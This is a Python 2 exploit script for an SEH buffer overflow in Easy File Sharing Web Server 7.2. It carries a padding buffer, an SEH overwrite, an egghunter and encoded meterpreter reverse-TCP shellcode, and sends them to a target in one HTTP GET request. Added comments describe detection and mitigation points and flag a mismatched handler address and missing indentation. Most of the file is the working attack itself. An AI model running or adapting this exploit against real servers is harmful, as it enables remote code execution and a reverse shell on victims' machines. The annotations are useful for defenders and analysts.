- #!/usr/bin/python
- # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter)
- # Date: 2016/8/31
- # Exploit Author: Iran Cyber Security Group
- # Vendor Homepage: http://www.sharing-file.com
- # Software Link: http://www.sharing-file.com/efssetup.exe
- # Version: 7.2 [LATEST]
- # Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems]
- # CVE : N/A
- # Usage : python exploit.py [IP or Domain]
- # Discovered By Arash Khazaei (AKA XoDiAK)
- # Greetz To Iran Cyber Members & My Friends
- import sys,socket
- from struct import pack
- # Target host comes from the first command-line argument; the port is fixed
- # at 80 (plain HTTP). argv is not checked, so running the script with no
- # argument fails on this line with IndexError.
- HOST = sys.argv[1]
- PORT = 80
- # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte
- # Replace It With Your Own Shellcode !
- # Payload blob: the 8-byte ASCII marker "w00tw00t" followed by 335 encoded
- # bytes (23 rows, 15 bytes each except the last row of 5). Per the author's
- # msfvenom line above, 0x2f ('/') and 0x5c ('\') were excluded as bad
- # characters, which fits a payload carried inside an HTTP request path.
- # Detection notes: the literal "w00tw00t" travels in the request line, so it
- # is a usable (but trivially changeable) string match for HTTP logs and IDS
- # rules. The stated payload type is a reverse TCP connection, so a compromised
- # host would show an unexpected outbound connection from the web server
- # process; egress filtering and alerting on such connections apply here.
- shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
- "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1"
- "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d"
- "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61"
- "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79"
- "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32"
- "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9"
- "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f"
- "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85"
- "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7"
- "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab"
- "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3"
- "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31"
- "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba"
- "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11"
- "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90"
- "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e"
- "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09"
- "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a"
- "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59"
- "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb"
- "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b"
- "\x98\x35\x70\x3b\xe0")
- # Request-path layout, in order: filler, overwritten SEH record (next-handler
- # field, then handler pointer), a 32-byte search stub, then the tagged payload.
- # Padding !
- # 4061 filler bytes; presumably the distance from the start of the copied
- # path to the SEH record in the vulnerable request handler (not shown here).
- junk = "A" * 4061
- # Next SEH
- # Four bytes placed in the "next handler" field of the SEH record.
- nseh = "\xeb\x06\x90\x90"
- # 0x1000108b [ImageLoader.dll] POP POP RET
- # NOTE(review): the address in the comment above (0x1000108b) does not match
- # the value actually packed below (0x10018848); the page does not say which
- # one was verified. The value is written as a little-endian 32-bit integer.
- # Mitigation note: a hard-coded module address is only usable when that module
- # loads at a fixed base and is accepted as an exception handler, so presumably
- # the named DLL is built without ASLR/SafeSEH (confirm against the shipped
- # binary). System-wide SEHOP and DEP are the relevant OS-level hardening.
- seh = pack('<L', 0x10018848)
- # Egg Hunter 32 Byte Tag = w00tw00t
- # The stub is 32 bytes long and embeds the ASCII bytes "w00t"
- # (\x77\x30\x30\x74), the same tag that prefixes the payload blob twice.
- egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
- "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
- # The trailing "\x90" multiplier evaluates to 4061-4-4-32-8-335-5000 = -1322;
- # a string times a negative int is empty, so nothing is appended after the
- # payload. The resulting request path is well over 4,000 bytes and contains
- # non-printable bytes. Detection/mitigation: a reverse proxy or WAF that caps
- # request-line length, or an IDS rule on oversized GET paths with binary
- # content, covers this request shape regardless of the payload used.
- exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000)
- # Opens one TCP connection to HOST:PORT, sends a single HTTP/1.0 GET whose
- # path is the oversized buffer, and closes without reading any response.
- # NOTE(review): the indentation of the try/except bodies is missing in this
- # rendering of the paste, and the print statements are Python 2 syntax.
- try:
- s = socket.socket()
- s.connect((HOST, PORT))
- s.send("GET " + exploit + " HTTP/1.0\r\n\r\n")
- s.close()
- # Bare except: any error in the block above (not only a refused connection)
- # is reported with the same message, and the original exception is discarded.
- except:
- print "Can't Connect To Web Server ! Is it up ?"
- # This line runs unconditionally, so the message is printed even when the
- # connection failed; it only reports that the script finished and gives no
- # information about the state of the target.
- print "Evil Buffer Sended Successfully!"